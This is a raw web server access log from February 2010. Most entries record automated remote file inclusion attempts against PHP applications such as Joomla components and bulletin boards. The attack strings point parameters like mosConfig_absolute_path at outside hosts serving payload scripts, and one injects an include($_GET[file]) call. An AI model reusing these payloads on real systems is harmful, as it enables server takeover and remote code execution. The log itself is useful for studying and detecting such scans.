81.176.226.164 - - [07/Feb/2010:09:26:55 -0500] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
81.176.226.164 - - [07/Feb/2010:09:28:42 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 318
81.176.226.164 - - [07/Feb/2010:09:28:42 -0500] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
65.55.207.101 - - [07/Feb/2010:09:28:53 -0500] "GET /robots.txt HTTP/1.1" 404 291
81.176.226.164 - - [07/Feb/2010:09:29:05 -0500] "GET /log/sdaglobal.org-access_log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 347
65.55.207.101 - - [07/Feb/2010:09:30:02 -0500] "GET /log/taipei.sdaglobal.org-access_log.4 HTTP/1.1" 200 90490
209.59.163.57 - - [07/Feb/2010:09:31:05 -0500] "GET /log/sdaglobal.org-error_log.1//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 336
81.176.226.164 - - [07/Feb/2010:09:31:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 318
81.176.226.164 - - [07/Feb/2010:09:31:08 -0500] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 322
209.59.163.57 - - [07/Feb/2010:09:33:56 -0500] "GET /log/sdaglobal.org-access_log.1%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 338
91.121.146.197 - - [07/Feb/2010:09:34:15 -0500] "GET /myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 292
91.121.146.197 - - [07/Feb/2010:09:34:15 -0500] "GET /log/sdaglobal.org-access_log.2/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 323
91.121.146.197 - - [07/Feb/2010:09:34:15 -0500] "GET /log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 296
74.86.155.18 - - [07/Feb/2010:09:35:18 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 317
74.86.155.18 - - [07/Feb/2010:09:35:18 -0500] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 321
74.86.155.18 - - [07/Feb/2010:09:35:18 -0500] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 348
218.38.136.126 - - [07/Feb/2010:09:35:59 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
218.38.136.126 - - [07/Feb/2010:09:35:59 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
200.93.147.154 - - [07/Feb/2010:09:36:25 -0500] "GET /log/sdaglobal.org-access_log.1//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:09:36:34 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
218.38.136.126 - - [07/Feb/2010:09:36:34 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
74.86.155.18 - - [07/Feb/2010:09:36:36 -0500] "GET /log/sdaglobal.org-error_log.1%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 349
200.93.147.154 - - [07/Feb/2010:09:36:56 -0500] "GET /log/sdaglobal.org-access_log.4//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:09:37:02 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:09:37:02 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 352
218.38.136.126 - - [07/Feb/2010:09:37:02 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
218.38.136.126 - - [07/Feb/2010:09:37:10 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:09:37:10 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 352
218.38.136.126 - - [07/Feb/2010:09:37:10 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
60.251.165.181 - - [07/Feb/2010:09:40:45 -0500] "GET /log/sdaglobal.org-error_log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 326
60.251.165.181 - - [07/Feb/2010:09:40:47 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 296
60.251.165.181 - - [07/Feb/2010:09:40:47 -0500] "GET /log/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 300
93.174.121.139 - - [07/Feb/2010:09:41:55 -0500] "GET /log//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 322
93.174.121.139 - - [07/Feb/2010:09:41:55 -0500] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 318
93.174.121.139 - - [07/Feb/2010:09:41:55 -0500] "GET /log/sdaglobal.org-access_log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 349
60.251.165.181 - - [07/Feb/2010:09:42:42 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 328
93.174.121.139 - - [07/Feb/2010:09:44:24 -0500] "GET /log/sdaglobal.org-access_log//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 347
93.174.121.139 - - [07/Feb/2010:09:44:45 -0500] "GET /log/sdaglobal.org-error_log.1//components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 348
222.231.2.122 - - [07/Feb/2010:09:45:09 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 9426
222.231.2.122 - - [07/Feb/2010:09:45:09 -0500] "GET /log/sdaglobal.org-access_log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 310
222.231.2.122 - - [07/Feb/2010:09:45:09 -0500] "GET /log/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 59636
66.249.65.235 - - [07/Feb/2010:09:48:27 -0500] "GET /log/plneon.hitechemall.com-error_log HTTP/1.1" 200 -
91.121.146.197 - - [07/Feb/2010:09:50:15 -0500] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 360
91.121.146.197 - - [07/Feb/2010:09:50:15 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 329
91.121.146.197 - - [07/Feb/2010:09:50:15 -0500] "GET /log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 333
91.121.146.197 - - [07/Feb/2010:09:50:22 -0500] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 360
207.46.199.194 - - [07/Feb/2010:09:50:25 -0500] "GET /robots.txt HTTP/1.1" 404 291
60.251.165.181 - - [07/Feb/2010:09:52:02 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 296
60.251.165.181 - - [07/Feb/2010:09:52:03 -0500] "GET /log/sdaglobal.org-error_log%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 326
60.251.165.181 - - [07/Feb/2010:09:52:03 -0500] "GET /log/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 300
74.86.155.18 - - [07/Feb/2010:09:52:11 -0500] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 346
89.36.175.10 - - [07/Feb/2010:09:52:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 331
89.36.175.10 - - [07/Feb/2010:09:52:38 -0500] "GET /log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 335
89.36.175.10 - - [07/Feb/2010:09:52:38 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 364
60.251.165.181 - - [07/Feb/2010:09:52:54 -0500] "GET /log/sdaglobal.org-error_log.4%20%20/akocomments.php?mosConfig_absolute_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 328
209.59.163.57 - - [07/Feb/2010:09:53:06 -0500] "GET /log/sdaglobal.org-access_log.4/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 326
209.59.163.57 - - [07/Feb/2010:09:53:06 -0500] "GET /lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 295
209.59.163.57 - - [07/Feb/2010:09:53:06 -0500] "GET /log/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 299
209.59.163.57 - - [07/Feb/2010:09:53:08 -0500] "GET /log/sdaglobal.org-error_log.4/lostpasswd.php?env[include_prefix]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 325
74.86.155.18 - - [07/Feb/2010:09:53:20 -0500] "GET /log/sdaglobal.org-error_log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 345
69.174.48.203 - - [07/Feb/2010:09:56:11 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 317
69.174.48.203 - - [07/Feb/2010:09:56:11 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 313
69.174.48.203 - - [07/Feb/2010:09:56:11 -0500] "GET /log/sdaglobal.org-error_log.2//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 343
74.86.155.18 - - [07/Feb/2010:09:57:45 -0500] "GET /log/sdaglobal.org-error_log.1/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 347
91.121.146.197 - - [07/Feb/2010:10:03:16 -0500] "GET /log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 296
91.121.146.197 - - [07/Feb/2010:10:03:16 -0500] "GET /myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 292
91.121.146.197 - - [07/Feb/2010:10:03:19 -0500] "GET /log/sdaglobal.org-access_log.2/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:10:04:03 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:10:04:03 -0500] "GET /log/sdaglobal.org-access_log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 350
218.38.136.126 - - [07/Feb/2010:10:04:03 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
69.174.48.203 - - [07/Feb/2010:10:05:38 -0500] "GET /log/sdaglobal.org-error_log.1//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 343
69.174.48.203 - - [07/Feb/2010:10:05:38 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 313
69.174.48.203 - - [07/Feb/2010:10:05:38 -0500] "GET /log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 317
69.174.48.203 - - [07/Feb/2010:10:05:38 -0500] "GET /log/sdaglobal.org-access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 342
218.38.136.126 - - [07/Feb/2010:10:05:38 -0500] "GET ///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 319
218.38.136.126 - - [07/Feb/2010:10:05:39 -0500] "GET /log/sdaglobal.org-access_log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 350
218.38.136.126 - - [07/Feb/2010:10:05:40 -0500] "GET /log///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 323
218.38.136.126 - - [07/Feb/2010:10:06:46 -0500] "GET /log/sdaglobal.org-error_log.1%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 351
218.38.136.126 - - [07/Feb/2010:10:07:27 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 352
218.38.136.126 - - [07/Feb/2010:10:07:30 -0500] "GET /log/sdaglobal.org-access_log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 350
218.38.136.126 - - [07/Feb/2010:10:08:06 -0500] "GET /log/sdaglobal.org-error_log.1%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 351
218.38.136.126 - - [07/Feb/2010:10:08:33 -0500] "GET /log/sdaglobal.org-access_log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 350
218.38.136.126 - - [07/Feb/2010:10:08:34 -0500] "GET /log/sdaglobal.org-access_log.4%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 352
220.73.144.196 - - [07/Feb/2010:10:17:56 -0500] "GET ///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308
220.73.144.196 - - [07/Feb/2010:10:17:56 -0500] "GET /log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 312
220.73.144.196 - - [07/Feb/2010:10:18:14 -0500] "GET /log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 312
220.73.144.196 - - [07/Feb/2010:10:18:14 -0500] "GET ///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308
91.121.146.197 - - [07/Feb/2010:10:20:48 -0500] "GET /log/sdaglobal.org-access_log.2/m2f/m2f_phpbb204.php?m2f_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 332
91.121.146.197 - - [07/Feb/2010:10:20:48 -0500] "GET /log/m2f/m2f_phpbb204.php?m2f_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 305
91.121.146.197 - - [07/Feb/2010:10:20:48 -0500] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 301
190.213.23.106 - - [07/Feb/2010:10:30:00 -0500] "GET / HTTP/1.1" 200 9426
190.213.23.106 - - [07/Feb/2010:10:30:00 -0500] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
190.213.23.106 - - [07/Feb/2010:10:30:01 -0500] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
190.213.23.106 - - [07/Feb/2010:10:30:02 -0500] "GET /images/welcome.gif HTTP/1.1" 200 2565
190.213.23.106 - - [07/Feb/2010:10:30:02 -0500] "GET /images/select.gif HTTP/1.1" 200 1792
190.213.23.106 - - [07/Feb/2010:10:30:03 -0500] "GET /images/english.gif HTTP/1.1" 200 2582
190.213.23.106 - - [07/Feb/2010:10:30:03 -0500] "GET /images/china.gif HTTP/1.1" 200 3479
190.213.23.106 - - [07/Feb/2010:10:30:03 -0500] "GET /images/chinese.gif HTTP/1.1" 200 3578
190.213.23.106 - - [07/Feb/2010:10:30:04 -0500] "GET /images/czech.gif HTTP/1.1" 200 1137
190.213.23.106 - - [07/Feb/2010:10:30:04 -0500] "GET /images/filipino.gif HTTP/1.1" 200 1328
190.213.23.106 - - [07/Feb/2010:10:30:04 -0500] "GET /images/france.gif HTTP/1.1" 200 1094
190.213.23.106 - - [07/Feb/2010:10:30:04 -0500] "GET /images/germany.gif HTTP/1.1" 200 986
190.213.23.106 - - [07/Feb/2010:10:30:05 -0500] "GET /images/hungary.gif HTTP/1.1" 200 1115
190.213.23.106 - - [07/Feb/2010:10:30:05 -0500] "GET /images/india.gif HTTP/1.1" 200 1050
190.213.23.106 - - [07/Feb/2010:10:30:05 -0500] "GET /images/italy.gif HTTP/1.1" 200 1095
190.213.23.106 - - [07/Feb/2010:10:30:05 -0500] "GET /images/japan.gif HTTP/1.1" 200 1104
190.213.23.106 - - [07/Feb/2010:10:30:06 -0500] "GET /images/korea.gif HTTP/1.1" 200 1387
91.121.146.197 - - [07/Feb/2010:10:31:04 -0500] "GET /log//tags.php?BBCodeFile=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 294
91.121.146.197 - - [07/Feb/2010:10:31:04 -0500] "GET //tags.php?BBCodeFile=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 290
91.121.146.197 - - [07/Feb/2010:10:31:04 -0500] "GET /log/sdaglobal.org-access_log.2//tags.php?BBCodeFile=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 321
221.143.40.35 - - [07/Feb/2010:10:34:31 -0500] "GET /log/sdaglobal.org-access_log.4/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 328
221.143.40.35 - - [07/Feb/2010:10:34:31 -0500] "GET /log/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 301
221.143.40.35 - - [07/Feb/2010:10:34:32 -0500] "GET /////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 297
208.43.13.149 - - [07/Feb/2010:10:35:47 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 333
208.43.13.149 - - [07/Feb/2010:10:35:47 -0500] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 337
208.43.13.149 - - [07/Feb/2010:10:35:50 -0500] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 364
208.43.13.149 - - [07/Feb/2010:10:35:59 -0500] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 364
208.43.13.149 - - [07/Feb/2010:10:35:59 -0500] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 337
208.43.13.149 - - [07/Feb/2010:10:36:00 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 333
220.73.144.196 - - [07/Feb/2010:10:36:53 -0500] "GET ///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308
220.73.144.196 - - [07/Feb/2010:10:36:53 -0500] "GET /log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 312
220.73.144.196 - - [07/Feb/2010:10:36:53 -0500] "GET /log/sdaglobal.org-access_log.1%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 341
220.73.144.196 - - [07/Feb/2010:10:37:05 -0500] "GET ///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308
220.73.144.196 - - [07/Feb/2010:10:37:05 -0500] "GET /log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 312
220.73.144.196 - - [07/Feb/2010:10:37:05 -0500] "GET /log/sdaglobal.org-access_log.1%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 341
208.43.13.149 - - [07/Feb/2010:10:38:12 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 366
208.43.13.149 - - [07/Feb/2010:10:38:17 -0500] "GET /log/sdaglobal.org-access_log.4%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 366
218.38.136.125 - - [07/Feb/2010:10:43:36 -0500] "GET /log/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 298
218.38.136.125 - - [07/Feb/2010:10:43:37 -0500] "GET /log/sdaglobal.org-access_log.2/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 325
218.38.136.125 - - [07/Feb/2010:10:43:39 -0500] "GET /shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 294
116.40.122.117 - - [07/Feb/2010:10:48:33 -0500] "GET /log/sdaglobal.org-access_log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 363
116.40.122.117 - - [07/Feb/2010:10:48:34 -0500] "GET /log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338
116.40.122.117 - - [07/Feb/2010:10:48:34 -0500] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 334
116.40.122.117 - - [07/Feb/2010:10:49:01 -0500] "GET ////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 334
116.40.122.117 - - [07/Feb/2010:10:49:02 -0500] "GET /log/sdaglobal.org-access_log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 363
